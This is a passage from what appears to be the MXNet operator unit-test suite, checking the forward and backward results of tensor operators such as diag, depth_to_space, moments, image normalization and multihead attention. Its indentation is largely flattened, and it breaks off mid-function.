    # Test 1d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
    # Test 1d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
    # Test 1d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d input
x1 = np.random.randint(3,9)
x2 = np.random.randint(3,9)
x3 = np.random.randint(3,9)
x4 = np.random.randint(3,9)
a_np = np.random.random((x1, x2, x3, x4)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
# k = 0, axis1=0, axis2=1
r = mx.nd.diag(data=a, k=0, axis1=0, axis2=1)
assert_almost_equal(r, np.diagonal(a_np, offset=0, axis1=0, axis2=1))
# k = 1, axis1=1, axis2=0
r = mx.nd.diag(data=a, k=1, axis1=1, axis2=0)
assert_almost_equal(r, np.diagonal(a_np, offset=1, axis1=1, axis2=0))
    # k = -1, axis1=1, axis2=3
r = mx.nd.diag(data=a, k=-1, axis1=1, axis2=3)
assert_almost_equal(r, np.diagonal(a_np, offset=-1, axis1=1, axis2=3))
# k = 2, axis1=-2, axis2=0
r = mx.nd.diag(data=a, k=2, axis1=-2, axis2=0)
assert_almost_equal(r, np.diagonal(a_np, offset=2, axis1=-2, axis2=0))
# Test 4d backward, k=0, axis1=3, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=0, axis1=3, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=1, axis1=1, axis2=2
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1, axis1=1, axis2=2)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-1, axis1=2, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1, axis1=2, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-2, axis1=1, axis2=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-2, axis1=1, axis2=-1)
check_numeric_gradient(diag_sym, [a_np])
@with_seed()
def test_depthtospace():
def f(x, blocksize):
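        # Reference depth_to_space: split the channel dim into (blocksize, blocksize, C_out)
        # and interleave the two block factors into the spatial dims (NCHW layout).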
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, blocksize, blocksize, c // (blocksize**2), h, w])
tmp = np.transpose(tmp, [0, 3, 4, 1, 5, 2])
y = np.reshape(tmp, [b, c // (blocksize**2), h * blocksize, w * blocksize])
return y
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
n = random.randint(1, 5)
c = block * block * rand_mul1
h = random.randint(1, 5)
w = random.randint(1, 5)
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.depth_to_space(data, block)
assert_almost_equal(output, expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c // (block ** 2), h * block, w * block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.depth_to_space(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_depth_dim():
invalid_shape_inp = (n, block - 1, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_space_dim():
invalid_shape_inp = (n, block ** 2, 0, block + 1)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_block_size():
block = 0
        invalid_shape_inp = (n, c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
test_invalid_depth_dim()
test_invalid_space_dim()
test_invalid_block_size()
@with_seed()
def test_spacetodepth():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, c, h // blocksize, blocksize, w // blocksize, blocksize])
tmp = np.transpose(tmp, [0, 3, 5, 1, 2, 4])
y = np.reshape(tmp, [b, c * (blocksize**2), h // blocksize, w // blocksize])
return y
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
rand_mul2 = random.randint(1, 4)
n = random.randint(1, 5)
c = random.randint(1, 5)
h = block * rand_mul1
w = block * rand_mul2
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.space_to_depth(data, block)
assert_almost_equal(output, expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c * (block ** 2), h // block, w // block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.space_to_depth(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_space_dim():
        invalid_shape_inp = (n, c, block - 1, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n, c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_depth_dim():
invalid_shape_inp = (n, 0, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
test_invalid_space_dim()
test_invalid_block_size()
test_invalid_depth_dim()
@with_seed()
def test_softmax_cross_entropy():
def f_sm_ce(data, label):
return np.sum(-np.log(data) * label)
data = mx.sym.Variable('data')
label = mx.sym.Variable('label')
sym = mx.sym.softmax_cross_entropy(data=data, label=label)
num_labels = random.randint(100, 200)
batch_size = random.randint(100, 200)
np_data = rand_ndarray((batch_size, num_labels), stype='default').asnumpy()
np_sm = np_softmax(np_data)
np_label = np.random.randint(0, num_labels, (batch_size, ))
np_one_hot_label = np.zeros((batch_size, num_labels))
np_one_hot_label[np.arange(batch_size), np_label] = 1.
check_symbolic_forward(sym, {'data' : np_data, 'label' : np_label}, [np.array([f_sm_ce(np_sm, np_one_hot_label)])], rtol=1e-3, atol=1e-5)
@with_seed()
def test_split_v2():
dim = random.randint(2, 6)
shape = rand_shape_nd(dim)
axis = random.randint(-dim, dim-1)
axis_size = shape[axis]
samples = random.randint(0, axis_size - 1)
indices = sorted(random.sample([i for i in range(1, axis_size)], samples))
indices = tuple(indices)
mx_data = rand_ndarray(shape)
np_data = mx_data.asnumpy()
np_out = np.split(np_data, indices_or_sections=indices, axis=axis)
data = mx.sym.Variable("data")
sym = mx.sym.split_v2(data, indices_or_sections=indices, axis=axis)
check_symbolic_forward(sym, {"data": mx_data}, np_out, rtol=1e-3, atol=1e-5)
out_grad = [np.ones(arr.shape) for arr in np_out]
check_symbolic_backward(sym, {"data": mx_data}, out_grad, [np.concatenate(out_grad, axis=axis)])
@with_seed()
def test_moments():
dim = random.randint(2, 5)
shape = rand_shape_nd(dim, dim=5)
axes = [i for i in range(dim)]
test_dims = random.sample(axes, random.randint(1, dim))
test_axes = tuple(sorted(test_dims))
np_a = np.random.uniform(-1.0, 1.0, shape)
a = mx.nd.array(np_a)
for keepdims in [True, False]:
eps = 1e-3
np_a[abs(np_a) < eps] = 2 * eps
np_mean = np.mean(np_a, axis=test_axes, keepdims=keepdims)
np_var = np.var(np_a, axis=test_axes, keepdims=keepdims)
mx_mean, mx_var = mx.nd.moments(a, keepdims=keepdims, axes=test_axes)
N = np_a.size / np_mean.size
mx_sym = mx.sym.Variable("data")
mx_moments = mx.sym.moments(mx_sym, axes=test_axes, keepdims=keepdims)
mx_test_sym = mx.sym.elemwise_add(mx_moments[0], mx_moments[1])
if len(np_mean.shape) == 0:
np_mean = np_mean.reshape(mx_mean.shape)
np_var = np_var.reshape(mx_var.shape)
assert np_mean.shape == mx_mean.shape
assert np_var.shape == mx_var.shape
check_symbolic_forward(mx_test_sym, [np_a], [np_mean + np_var], rtol=1e-3, atol=1e-5)
check_numeric_gradient(mx_test_sym, [np_a], numeric_eps=eps, rtol=1e-2, atol=2e-4)
@with_seed()
def test_invalid_kernel_size():
invalid_kernel_size = 28
assert_exception(
mx.nd.Correlation,
MXNetError,
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=invalid_kernel_size)
@with_seed()
def test_valid_kernel_size():
valid_kernel_size = 9
mx.nd.Correlation(
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=valid_kernel_size)
@with_seed()
def test_valid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
    output_data = mx.nd.Pooling(
input_data,
kernel=kernel,
stride=stride,
pad=(0,0,0),
pool_type='max',
name='pooling',
pooling_convention="same")
assert(math.ceil(input_data.shape[2]/stride) == output_data.shape[2])
@with_seed()
def test_invalid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
pad = 2
assert_exception(
mx.nd.Pooling,
MXNetError,
input_data,
stride=stride,
kernel=kernel,
pad=pad,
pool_type='max',
name='pooling',
pooling_convention="same")
@with_seed()
def test_image_normalize():
# Part 1 - Test 3D input with 3D mean/std
shape_3d = (3, 28, 28)
mean = (0, 1, 2)
std = (3, 2, 1)
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
data_expected_3d[:][:][0] = data_expected_3d[:][:][0] / 3.0
data_expected_3d[:][:][1] = (data_expected_3d[:][:][1] - 1.0) / 2.0
data_expected_3d[:][:][2] = data_expected_3d[:][:][2] - 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
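    # (normalize computes (x - mean[c]) / std[c] per channel, so d(out)/d(in) = 1 / std[c])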
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:][:][0] = 1 / 3.0
grad_expected_3d[:][:][1] = 1 / 2.0
grad_expected_3d[:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 2 - Test 4D input with 3D mean/std
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[0][:][:][0] = data_expected_4d[0][:][:][0] / 3.0
data_expected_4d[0][:][:][1] = (data_expected_4d[0][:][:][1] - 1.0) / 2.0
data_expected_4d[0][:][:][2] = data_expected_4d[0][:][:][2] - 2.0
data_expected_4d[1][:][:][0] = data_expected_4d[1][:][:][0] / 3.0
data_expected_4d[1][:][:][1] = (data_expected_4d[1][:][:][1] - 1.0) / 2.0
data_expected_4d[1][:][:][2] = data_expected_4d[1][:][:][2] - 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[0][:][:][0] = 1 / 3.0
grad_expected_4d[0][:][:][1] = 1 / 2.0
grad_expected_4d[0][:][:][2] = 1 / 1.0
grad_expected_4d[1][:][:][0] = 1 / 3.0
grad_expected_4d[1][:][:][1] = 1 / 2.0
grad_expected_4d[1][:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
# Part 3 - Test 3D input with scalar mean/std
shape_3d = (3, 28, 28)
mean = 1.0
std = 2.0
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
data_expected_3d[:][:][:] = (data_expected_3d[:][:][:] - 1.0) / 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:][:][:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 4 - Test 4D input with scalar mean/std
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[:][:][:][:] = (data_expected_4d[:][:][:][:] - 1.0) / 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[:][:][:][:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
@with_seed()
def test_index_array():
def test_index_array_default():
for shape in [(10,), (7, 5, 29), (5, 7, 11, 13, 17, 19)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(shape)
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)
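            # np.stack(np.mgrid[...], axis=-1) yields an array of shape `shape + (ndim,)` whose
            # last axis holds each element's coordinates -- the reference output of index_array.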
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_dim():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(())
expected = np.zeros((0,))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones((0, 0, 0))
expected = np.zeros((0, 0, 0, 3))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
def test_index_array_select_axes():
shape = (5, 7, 11, 13, 17, 19)
for axes in [(3,), (4, 1), (5, 1, 3), (-1,), (-5, -1, -3)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=axes)
input_array = np.ones(shape)
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)[..., axes]
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_select_axes_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=(2, 1))
input_array = np.ones((0, 0, 0, 0))
expected = np.zeros((0, 0, 2))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
test_index_array_default()
test_index_array_default_zero_dim()
test_index_array_default_zero_size()
test_index_array_select_axes()
test_index_array_select_axes_zero_size()
@with_seed()
def test_scalar_tensor_creation():
assertRaises(MXNetError, mx.nd.zeros, shape=())
assertRaises(MXNetError, mx.nd.ones, shape=())
with mx.np_shape():
data_mx = mx.nd.ones(shape=())
data_np = np.ones((), dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
@with_seed()
def test_zero_size_tensor_creation():
assertRaises(MXNetError, mx.nd.zeros, shape=(0, 1, 3, 0))
assertRaises(MXNetError, mx.nd.ones, shape=(0, 1, 3, 0))
with mx.np_shape():
data_mx = mx.nd.ones(shape=(0, 1, 0, 4))
data_np = np.ones(shape=data_mx.shape, dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
@with_seed()
def test_concat_with_zero_size_tensor():
with mx.np_shape():
data1 = mx.nd.ones((0, 8, 12))
data2 = mx.nd.ones((3, 8, 12))
data3 = mx.nd.ones((0, 8, 12))
ret = mx.nd.Concat(data1, data2, data3, dim=0)
assert ret.shape == (3, 8, 12)
data1 = mx.nd.ones((0, 3, 10))
data2 = mx.nd.ones((0, 4, 10))
data3 = mx.nd.ones((0, 5, 10))
ret = mx.nd.Concat(data1, data2, data3, dim=1)
assert ret.shape == (0, 12, 10)
@with_seed()
def test_np_shape_decorator():
@mx.use_np_shape
def check_scalar_one():
"""Generate scalar one tensor"""
return mx.nd.ones(shape=())
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
for active in [True, False]:
with mx.np_shape(active=active):
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
@mx.use_np_shape
def check_concat(shape1, shape2, axis):
data1 = mx.nd.ones(shape1)
data2 = mx.nd.ones(shape2)
ret = mx.nd.Concat(data1, data2, dim=axis)
expected_ret = np.concatenate((data1.asnumpy(), data2.asnumpy()), axis=axis)
assert ret.shape == expected_ret.shape
check_concat((0, 3, 4), (5, 3, 4), 0)
check_concat((8, 0, 5), (8, 7, 5), 1)
check_concat((8, 0, 0), (8, 0, 0), 2)
for active in [True, False]:
check_concat((0, 3, 4), (5, 3, 4), 0)
check_concat((8, 0, 5), (8, 7, 5), 1)
check_concat((8, 0, 0), (8, 0, 0), 2)
@with_seed()
def test_add_n():
data_shape = (2, 2)
input_num = 5
data = [mx.nd.random.uniform(shape=data_shape) for i in range(input_num)]
rslt = mx.nd.zeros(shape=data_shape)
for i in range(input_num):
rslt += data[i]
add_n_rslt = mx.nd.add_n(*data, out=data[0])
assert_almost_equal(rslt.asnumpy(), add_n_rslt.asnumpy(), atol=1e-5)
def test_get_all_registered_operators():
ops = get_all_registered_operators()
ok_(isinstance(ops, list))
ok_(len(ops) > 0)
ok_('Activation' in ops)
def test_get_operator_arguments():
operator_arguments = get_operator_arguments('Activation')
ok_(isinstance(operator_arguments, OperatorArguments))
ok_(operator_arguments.names == ['data', 'act_type'])
ok_(operator_arguments.types
== ['NDArray-or-Symbol', "{'relu', 'sigmoid', 'softrelu', 'softsign', 'tanh'}, required"])
ok_(operator_arguments.narg == 2)
def test_transpose_infer_shape_back():
o1 = mx.sym.ones(shape=[2,3])
o2 = mx.sym.ones(shape=[-1,-1])
t = mx.sym.transpose(o2)
b = o1 + t
x = b.bind(mx.cpu(), args={})
y = x.forward()
assert(y[0].shape == (2,3))
def test_transpose_infer_shape_mixed():
o1 = mx.sym.ones(shape=[2,-1])
o2 = mx.sym.ones(shape=[3,-1])
t = mx.sym.transpose(o2)
b = o1 + t
x = b.bind(mx.cpu(), args={})
y = x.forward()
assert(y[0].shape == (2,3))
@with_seed()
def test_sample_normal_default_shape():
# Test case from https://github.com/apache/incubator-mxnet/issues/16135
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]))
assert s.shape == (1,)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=())
assert s.shape == (1,)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=1)
assert s.shape == (1, 1)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=(1,))
assert s.shape == (1, 1)
def test_large_tensor_disabled_err_msg():
LARGE_X = 4300000000
MEDIUM_X = 1000000000
SMALL_Y = 1
shape = (2, LARGE_X)
def check_nd_array():
x = np.arange(0, LARGE_X)
assertRaises(MXNetError, mx.nd.array, x)
def check_nd_ones():
assertRaises(MXNetError, mx.nd.ones, shape)
def check_nd_zeros():
assertRaises(MXNetError, mx.nd.zeros, shape)
def check_nd_full():
val = 1
assertRaises(Exception, mx.nd.full, shape, val)
def check_nd_arange():
start = 0
stop = LARGE_X
assertRaises(Exception, mx.nd.arange, start, stop)
def check_nd_random():
shape = (2, LARGE_X)
def check_random_exp():
lam = 4
assertRaises(MXNetError, mx.nd.random_exponential, lam, shape)
def check_random_gamma():
alpha = 9
beta = 0.5
assertRaises(MXNetError, mx.nd.random_gamma, alpha, beta, shape)
def check_random_normal():
loc = 0
scale = 1
assertRaises(MXNetError, mx.nd.random_normal, loc, scale, shape)
def check_random_poisson():
lam = 4
assertRaises(MXNetError, mx.nd.random_poisson, lam, shape)
def check_random_randint():
low = 0
high = 1000000
assertRaises(MXNetError, mx.nd.random_randint, low, high, shape)
def check_random_uniform():
low = 0
high = 1
assertRaises(MXNetError, mx.nd.random_uniform, low, high, shape)
def check_multihead_attention_selfatt(dtype):
def convert_weight(F, q_weight, k_weight, v_weight, num_heads):
q_weight = F.reshape(q_weight, shape=(num_heads, -1, 0), reverse=True)
k_weight = F.reshape(k_weight, shape=(num_heads, -1, 0), reverse=True)
v_weight = F.reshape(v_weight, shape=(num_heads, -1, 0), reverse=True)
all_weights = F.concat(q_weight, k_weight, v_weight, dim=-2)
all_weights = F.reshape(all_weights, shape=(-1, 0), reverse=True)
return all_weights
def convert_bias(F, q_bias, k_bias, v_bias, num_heads):
q_bias = F.reshape(q_bias, shape=(num_heads, -1))
k_bias = F.reshape(k_bias, shape=(num_heads, -1))
v_bias = F.reshape(v_bias, shape=(num_heads, -1))
all_bias = F.stack(q_bias, k_bias, v_bias, axis=1)
all_bias = F.reshape(all_bias, shape=(-1,))
return all_bias
batch_size = 2
qkv_length = 7 # length of a sequence
qkv_dim = 9 # dimension of encoding
num_heads = 3 # number of attention head
head_dim = 5 # head size
out_dim = 13 * num_heads
qkv_units = num_heads * head_dim
arg_params = {
'qkv': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'k_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'v_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'k_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'v_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'out_weight': mx.nd.array(np.random.rand(*(out_dim, qkv_units)).astype(dtype) * 0.1, dtype=dtype),
'out_bias': mx.nd.array(np.random.rand(*(out_dim,)).astype(dtype) * 0.1, dtype=dtype),
}
qkv = mx.sym.Variable('qkv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
qkv_weight = convert_weight(mx.sym, q_weight, k_weight, v_weight, num_heads)
qkv_bias = convert_bias(mx.sym, q_bias, k_bias, v_bias, num_heads)
qkv = mx.sym.transpose(qkv, axes=(1, 0, 2))
qkv_proj = mx.sym.FullyConnected(qkv, weight=qkv_weight, bias=qkv_bias, flatten=False,
num_hidden=qkv_units * 3, no_bias=False)
att_score = mx.sym.contrib.interleaved_matmul_selfatt_qk(
qkv_proj, heads=num_heads)
att_score = att_score + sonde
weighted_value = mx.sym.contrib.interleaved_matmul_selfatt_valatt(
qkv_proj, att_score, heads=num_heads)
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.transpose(output, axes=(1, 0, 2))
output = mx.sym.Group([output, att_score])
executor = output.simple_bind(ctx=default_context(),
qkv=(batch_size, qkv_length, qkv_dim),
q_weight=(qkv_units, qkv_dim),
q_bias=(qkv_units,),
k_weight=(qkv_units, qkv_dim),
k_bias=(qkv_units,),
v_weight=(qkv_units, qkv_dim),
v_bias=(qkv_units,),
type_dict={'qkv': dtype,
'q_weight': dtype,
'k_weight': dtype,
'v_weight': dtype,
'q_bias': dtype,
'k_bias': dtype,
'v_bias': dtype,
'sonde': dtype},
grad_req='write', force_rebind=True)
output_shape = executor.outputs[0].shape
output_grads = np.random.rand(*output_shape).astype(dtype) * 0.1
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_opti = executor.outputs[0].asnumpy()
att_score_opti = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype),
mx.nd.zeros(att_score_opti.shape, dtype=dtype)])
grads_opti = {k: v.asnumpy() for k, v in executor.grad_dict.items()}
qkv = mx.sym.Variable('qkv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
q = mx.sym.FullyConnected(qkv, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
k = mx.sym.FullyConnected(qkv, weight=k_weight, bias=k_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
v = mx.sym.FullyConnected(qkv, weight=v_weight, bias=v_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
q = mx.sym.reshape(q, shape=(0, 0, num_heads, -1))
q = mx.sym.transpose(q, axes=(0, 2, 1, 3))
q = mx.sym.reshape(q, shape=(-1, 0, 0), reverse=True)
k = mx.sym.reshape(k, shape=(0, 0, num_heads, -1))
k = mx.sym.transpose(k, axes=(0, 2, 1, 3))
k = mx.sym.reshape(k, shape=(-1, 0, 0), reverse=True)
q = mx.sym.contrib.div_sqrt_dim(q)
att_score = mx.sym.batch_dot(q, k, transpose_b=True)
att_score = att_score + sonde
v = mx.sym.reshape(v, shape=(0, 0, num_heads, -1))
v = mx.sym.transpose(v, axes=(0, 2, 1, 3))
v = mx.sym.reshape(v, shape=(-1, 0, 0), reverse=True)
weighted_value = mx.sym.batch_dot(att_score, v)
weighted_value = mx.sym.reshape(weighted_value, shape=(-1, num_heads, 0, 0),
reverse=True)
weighted_value = mx.sym.transpose(weighted_value, axes=(0, 2, 1, 3))
weighted_value = mx.sym.reshape(weighted_value, shape=(0, 0, -1))
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.Group([output, att_score])
executor = output.simple_bind(ctx=default_context(),
qkv=(batch_size, qkv_length, qkv_dim),
type_dict={'qkv': dtype},
grad_req='write', force_rebind=True)
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_orig = executor.outputs[0].asnumpy()
att_score_orig = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype),
mx.nd.zeros(att_score_orig.shape, dtype=dtype)])
grads_orig = {k : v.asnumpy() for k, v in executor.grad_dict.items()}
assert_allclose(att_score_orig, att_score_opti, rtol=1e-2, atol=1e-3)
assert_allclose(output_orig, output_opti, rtol=1e-2, atol=1e-3)
for k in grads_opti.keys():
assert(grads_orig[k].dtype == grads_opti[k].dtype)
assert(grads_orig[k].shape == grads_opti[k].shape)
assert_allclose(grads_orig[k], grads_opti[k], rtol=1e-2, atol=1e-3)
@with_seed()
@assert_raises_cuda_not_satisfied(min_version='9.1')
def test_multihead_attention_selfatt():
dtypes = ['float32']
if default_context().device_type == 'gpu':
dtypes += ['float16']
for dtype in dtypes:
check_multihead_attention_selfatt(dtype=dtype)
def check_multihead_attention_encdec(dtype):
def convert_weight(F, k_weight, v_weight, num_heads):
k_weight = F.reshape(k_weight, shape=(num_heads, -1, 0), reverse=True)
v_weight = F.reshape(v_weight, shape=(num_heads, -1, 0), reverse=True)
all_weights = F.concat(k_weight, v_weight, dim=-2)
all_weights = F.reshape(all_weights, shape=(-1, 0), reverse=True)
return all_weights
def convert_bias(F, k_bias, v_bias, num_heads):
k_bias = F.reshape(k_bias, shape=(num_heads, -1))
v_bias = F.reshape(v_bias, shape=(num_heads, -1))
all_bias = F.stack(k_bias, v_bias, axis=1)
all_bias = F.reshape(all_bias, shape=(-1,))
return all_bias
batch_size = 2
